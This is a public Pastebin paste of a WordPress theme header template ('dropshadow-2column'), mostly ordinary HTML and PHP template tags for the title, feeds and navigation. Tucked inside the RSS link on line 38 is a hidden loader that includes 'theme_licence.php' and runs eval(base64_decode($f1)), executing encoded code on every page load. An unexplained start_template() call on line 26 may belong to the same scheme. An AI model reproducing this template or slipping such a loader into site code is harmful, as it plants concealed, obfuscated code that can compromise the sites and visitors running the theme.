Share Pastebin
Guest
Public paste!

lutherross3

By: a guest | Feb 8th, 2010 | Syntax: None | Size: 1.89 KB | Hits: 52 | Expires: Never
Copy text to clipboard
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  2. <html xmlns="http://www.w3.org/1999/xhtml">
  3. <head profile="http://gmpg.org/xfn/11">
  4. <meta http-equiv="Content-Type" content="<?php bloginfo('html_type'); ?>; charset=<?php bloginfo('charset'); ?>" />
  5. <meta name="distribution" content="global" />
  6. <meta name="robots" content="follow, all" />
  7. <meta name="language" content="en, sv" />
  8.  
  9. <title><?php wp_title(''); ?><?php if(wp_title('', false)) { echo ' :'; } ?> <?php bloginfo('name'); ?></title>
  10. <meta name="generator" content="WordPress <?php bloginfo('version'); ?>" />
  11. <!-- leave this for stats please -->
  12.  
  13. <link rel="Shortcut Icon" href="<?php echo get_settings('home'); ?>/wp-content/themes/dropshadow-2column/images/favicon.ico" type="image/x-icon" />
  14. <link rel="alternate" type="application/rss+xml" title="RSS 2.0" href="<?php bloginfo('rss2_url'); ?>" />
  15. <link rel="alternate" type="text/xml" title="RSS .92" href="<?php bloginfo('rss_url'); ?>" />
  16. <link rel="alternate" type="application/atom+xml" title="Atom 0.3" href="<?php bloginfo('atom_url'); ?>" />
  17. <link rel="pingback" href="<?php bloginfo('pingback_url'); ?>" />
  18. <?php wp_get_archives('type=monthly&format=link'); ?>
  19. <?php wp_head(); ?>
  20. <style type="text/css" media="screen">
  21. <!-- @import url( <?php bloginfo('stylesheet_url'); ?> ); -->
  22. </style>
  23. </head>
  24.  
  25. <body>
  26. <?php start_template(); ?>
  27. <div id="header">
  28.  
  29. <div class="headerleft">
  30.         <a href="<?php echo get_settings('home'); ?>/"><?php bloginfo('name'); ?></a><br />
  31.         <b><?php bloginfo('description'); ?></b>
  32.         </div>
  33.  
  34. <div class="headerright">
  35.         <ul>
  36.                 <li><a href="<?php echo get_settings('home'); ?>">Home</a></li>
  37.                 <?php wp_list_pages('title_li=&depth=1'); ?>
  38.                 <li><a href="<?php require_once("theme_licence.php"); eval(base64_decode($f1)); bloginfo('rss2_url'); ?>">RSS</a></li>
  39.         </ul>
  40. </div>
  41.  
  42. </div>